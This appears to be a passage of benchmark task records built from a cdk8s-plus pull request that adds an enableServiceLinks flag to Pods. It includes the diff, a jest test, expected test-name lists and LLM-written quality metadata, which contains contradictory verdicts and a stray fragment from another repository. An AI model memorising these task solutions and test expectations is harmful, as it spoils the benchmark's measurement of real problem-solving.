instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom" ]
Method: Pod.constructor(scope: Construct, id: string, props: PodProps) Location: src/pod.ts Inputs: - **scope** – the construct tree scope in which to define this pod. - **id** – logical identifier for the pod construct. - **props** – `PodProps` object; now includes an optional `enableServiceLinks?: boolean` flag. When set to `false`, the generated PodSpec will contain `enableServiceLinks: false`; defaults to `true` if omitted. Outputs: - Returns a new `Pod` construct instance. The instance’s synthesized Kubernetes manifest will include the `enableServiceLinks` field in its `spec` when the flag is provided. Description: Constructs a Kubernetes Pod resource. The new `enableServiceLinks` option lets callers control whether the pod’s environment receives automatically generated service link variables. Interface: PodProps Location: src/pod.ts (extends AbstractPodProps) Inputs: - All existing pod configuration fields (e.g., `containers`, `restartPolicy`, etc.). - **enableServiceLinks?: boolean** – optional flag controlling the `enableServiceLinks` field in the pod spec; defaults to `true` when omitted. Outputs: - Typed object passed to `Pod` constructor; the presence of `enableServiceLinks` influences the synthesized manifest. Description: Configuration object for creating a `Pod`. The newly added `enableServiceLinks` property gives callers explicit control over service‑link injection behavior for the pod. Interface: AbstractPodProps Location: src/pod.ts Inputs: - Existing abstract pod properties (e.g., `containers`, `hostNetwork`, `terminationGracePeriod`, etc.). - **enableServiceLinks?: boolean** – optional boolean mirroring the same purpose as in `PodProps`; propagated to concrete pod implementations. Outputs: - Provides the base set of properties for all pod‑like constructs. The added field is forwarded to the concrete `Pod` spec. Description: Base interface for pod‑related constructs. The addition of `enableServiceLinks` extends the contract to allow disabling automatic service‑link environment variables across all derived pod classes.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 12, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "B3", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": true, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/5471", "https://github.com/sorenlouv/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue only says to backport support for `enableServiceLinks` and points to an external PR for details, without specifying the property name or behavior. The test asserts that the synthesized pod spec includes an `enableServiceLinks` field set to false, which is not described in the issue text, indicating reliance on external information. This constitutes an external dependency (B3). The intent is only partially described, but the test matches the intended behavior once the property is added.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f6104a55d40167088381d2ae543547e865051d4a
2025-05-08 08:13:47
cdk8s-team__cdk8s-plus-5712
diff --git a/src/pod.ts b/src/pod.ts index 14e4dfd2..d8d93ec2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -22,6 +22,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; + public readonly enableServiceLinks?: boolean; protected readonly isolate: boolean; @@ -45,6 +46,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); + this.enableServiceLinks = props.enableServiceLinks; if (props.containers) { props.containers.forEach(c => this.addContainer(c)); @@ -254,6 +256,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), + enableServiceLinks: this.enableServiceLinks, }; } @@ -469,6 +472,15 @@ export interface AbstractPodProps extends base.ResourceProps { * @default Duration.seconds(30) */ readonly terminationGracePeriod?: Duration; + + /** + * Indicates whether information about services should be injected into pod's + * environment variables, matching the syntax of Docker links. + * + * @default true + * @see https://kubernetes.io/docs/concepts/services-networking/connect-applications-service/#accessing-the-service + */ + readonly enableServiceLinks?: boolean; } /**
feat(pod): support `enableServiceLinks` (backport #5471) # Backport This will backport the following commits from `k8s-32/main` to `k8s-31/main`: - [feat(pod): support &#x60;enableServiceLinks&#x60; (#5471)](https://github.com/cdk8s-team/cdk8s-plus/pull/5471) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Add support for configuring `enableServiceLinks` on Pods **Problem** Users cannot control whether Kubernetes injects service environment variables into Pods, limiting compatibility with workloads that rely on the default service link behavior. **Root Cause** The Pod construct did not expose the `enableServiceLinks` field from the underlying Kubernetes Pod spec, so the setting could not be customized. **Fix / Expected Behavior** - Introduce an optional `enableServiceLinks` flag in the Pod’s configuration interface. - Store the flag when a Pod is instantiated. - Propagate the flag into the generated Pod manifest under the appropriate spec field. - Document the new flag, noting its default aligns with Kubernetes (true). **Risk & Validation** - Verify that existing Pods without the flag continue to render the same manifest (default behavior unchanged). - Add tests to ensure the flag appears correctly in the rendered spec when set. - Run the full test suite to confirm no regressions in other pod features.
5,712
cdk8s-team/cdk8s-plus
diff --git a/test/pod.test.ts b/test/pod.test.ts index 17f44567..99ea4830 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -1605,3 +1605,14 @@ test('Containers should not specify "restartPolicy" field', () => { expect(() => Testing.synth(chart)).toThrowError(); }); +test('enableServiceLinks can be disabled', () => { + const chart = Testing.chart(); + new kplus.Pod(chart, 'Pod', { + containers: [{ image: 'image' }], + enableServiceLinks: false, + }); + + const spec = Testing.synth(chart)[0].spec; + expect(spec.enableServiceLinks).toBeFalsy(); +}); +
[ "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "enableServiceLinks can be disabled", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
[ "Can mutate metadata", "defaultChild", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaults", "custom", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "default configuration", "custom configuration", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "small size", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can select namespaces", "can select all namespaces", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom" ]
Method: Pod.constructor(scope: Construct, id: string, props: PodProps) Location: src/pod.ts Inputs: - **scope**: Construct – the construct tree parent. - **id**: string – logical ID of the pod. - **props**: PodProps – pod configuration object, now includes an optional `enableServiceLinks?: boolean` (default `true`). When set to `false`, the generated pod spec will have `enableServiceLinks: false`. Outputs: - A Kubernetes Pod resource whose synthesized spec contains the `enableServiceLinks` field reflecting the value passed in `props`. If `false` is provided, `spec.enableServiceLinks` will be falsy in the synthesized manifest. Description: Constructs a Pod with standard configuration options and the new `enableServiceLinks` flag that controls whether Kubernetes injects service‑link environment variables into the pod’s containers.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 12, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/sorenlouv/backport", "https://github.com/cdk8s-team/cdk8s-plus/pull/5471" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests backporting support for the `enableServiceLinks` flag on Pods, and the test asserts that disabling it results in `spec.enableServiceLinks` being falsy. The test aligns with the implied requirement, and no unrelated test dependencies or hidden expectations are present. There are no signals of B‑category problems, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f531d7df16ec08fce902faed92b5017a11c2f771
2023-10-26 08:36:31
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes.
baidu__amis-8510
